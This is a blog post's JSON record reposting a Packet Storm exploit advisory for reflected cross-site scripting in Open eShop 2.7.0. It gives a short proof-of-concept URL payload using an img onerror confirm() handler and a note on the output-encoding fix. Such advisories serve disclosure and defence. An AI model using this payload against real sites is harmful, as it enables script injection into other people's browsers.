{"id":56127,"date":"2024-04-08T18:50:06","date_gmt":"2024-04-08T14:50:06","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/177981\/openeshop270-xss.txt"},"modified":"2024-04-08T18:50:06","modified_gmt":"2024-04-08T14:50:06","slug":"open-eshop-2-7-0-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/open-eshop-2-7-0-cross-site-scripting\/","title":{"rendered":"Open eShop 2.7.0 Cross Site Scripting"},"content":{"rendered":"<pre readability=\"6.5\"><code readability=\"7\"># Exploit Title: Open eShop Version : 2.7.0 - Reflected XSS<br># Exploit Author: tmrswrr <br># Vendor Homepage: http:\/\/www.open-eshop.com\/<br># Version : 2.7.0<br># Date : 04\/08\/2024<p>1 ) Go to the home page https:\/\/127.0.0.1\/Open_eShop<br>2 ) Write this payload in the URL : test.html\"&gt;&lt;img src=x onerrora=confirm() onerror=confirm(1)&gt;<\/p><p>3 ) After saving it, you will see the XSS alert<\/p><p>https:\/\/127.0.0.1\/Open_eShop\/test.html\"&gt;&lt;img src=x onerrora=confirm() onerror=confirm(1)&gt;<\/p><p>Note: the leading \"&gt; closes an HTML attribute value, which suggests the requested path is reflected into the page without output encoding; HTML-encoding the reflected path on output is the usual fix.<\/p><\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: Open eShop Version : 2.7.0 &#8211; Reflected XSS# Exploit Author: tmrswrr # Vendor Homepage: http:\/\/www.open-eshop.com\/# Version : 2.7.0# Date : 04\/08\/20241 ) Go to the home page https:\/\/127.0.0.1\/Open_eShop2 ) Write this payload in the URL : test.html&#8221;&gt;&lt;img src=x onerrora=confirm() onerror=confirm(1)&gt;3 ) After saving it, you will see the XSS alerthttps:\/\/127.0.0.1\/Open_eShop\/test.html&#8221;&gt;&lt;img src=x onerrora=confirm() 
onerror=confirm(1)&gt;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-56127","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56127","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=56127"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56127\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=56127"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=56127"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=56127"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}